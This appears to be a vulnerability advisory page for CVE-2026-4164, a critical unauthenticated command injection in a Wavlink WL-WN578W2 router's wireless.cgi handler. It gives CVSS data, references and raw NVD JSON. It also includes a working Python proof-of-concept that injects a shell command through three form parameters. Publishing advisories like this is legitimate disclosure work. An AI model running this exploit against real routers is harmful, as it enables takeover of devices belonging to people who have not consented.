CVE-2026-4164

Description

A flaw has been found in Wavlink WL-WN578W2 221110. Impacted is the function Delete_Mac_list/SetName/GuestWifi of the file /cgi-bin/wireless.cgi of the component POST Request Handler. Executing a manipulation can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. It is recommended to upgrade the affected component.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Wavlink WL-WN578W2 固件版本 221110

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_ip = "192.168.10.1"  # Router IP address
target_url = f"http://{target_ip}/cgi-bin/wireless.cgi"

# Payload for command injection via SetName function
injection_payload = "; ls -la /etc/ > /tmp/cmd_output.txt;"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"http://{target_ip}/wireless.shtml"
}

# Example 1: SetName function exploitation
data_setname = {
    "SetName": injection_payload,
    "apply": "Apply"
}

# Example 2: Delete_Mac_list function exploitation  
data_delete_mac = {
    "Delete_Mac_list": injection_payload,
    "apply": "Apply"
}

# Example 3: GuestWifi function exploitation
data_guest = {
    "GuestWifi": injection_payload,
    "apply": "Apply"
}

def exploit(url, data, func_name):
    """Send malicious request to exploit command injection"""
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        print(f"[*] Exploit sent via {func_name} function")
        print(f"[*] Status Code: {response.status_code}")
        if response.status_code == 200:
            print(f"[+] Command injection successful - check router for output")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Execute exploits
print("[*] CVE-2026-4164 PoC - Wavlink WL-WN578W2 Command Injection")
print("[*] Target:", target_ip)

exploit(target_url, data_setname, "SetName")
exploit(target_url, data_delete_mac, "Delete_Mac_list")
exploit(target_url, data_guest, "GuestWifi")

print("[*] Exploitation complete")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4164
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4164
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4164/
[4] VulDB https://vuldb.com/cve/CVE-2026-4164
[5] https://dl.wavlink.com/firmware/RD/WINSTAR_WN578W2-A-2026-03-10-94f93d4-WO-mt7628-squashfs-sysupgrade.bin
[6] https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_1/README.md
[7] https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_2/README.md
[8] https://vuldb.com/?ctiid.351071
[9] https://vuldb.com/?id.351071
[10] https://vuldb.com/?submit.768292
[11] https://vuldb.com/?submit.768293
[12] https://vuldb.com/?submit.768294

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4164", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:55.380", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Wavlink WL-WN578W2 221110. Impacted is the function Delete_Mac_list/SetName/GuestWifi of the file /cgi-bin/wireless.cgi of the component POST Request Handler. Executing a manipulation can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. It is recommended to upgrade the affected component."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en Wavlink WL-WN578W2 221110. Se ve afectada la función Delete_Mac_list/SetName/GuestWifi del archivo /cgi-bin/wireless.cgi del componente Gestor de Solicitudes POST. La ejecución de una manipulación puede conducir a una inyección de comandos. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se recomienda actualizar el componente afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://dl.wavlink.com/firmware/RD/WINSTAR_WN578W2-A-2026-03-10-94f93d4-WO-mt7628-squashfs-sysupgrade.bin", "source": "[email protected]"}, {"url": "https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_1/README.md", "source": "[email protected]"}, {"url": "https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_2/README.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351071", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351071", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.768292", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.768293", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.768294", "source": "[email protected]"}]}}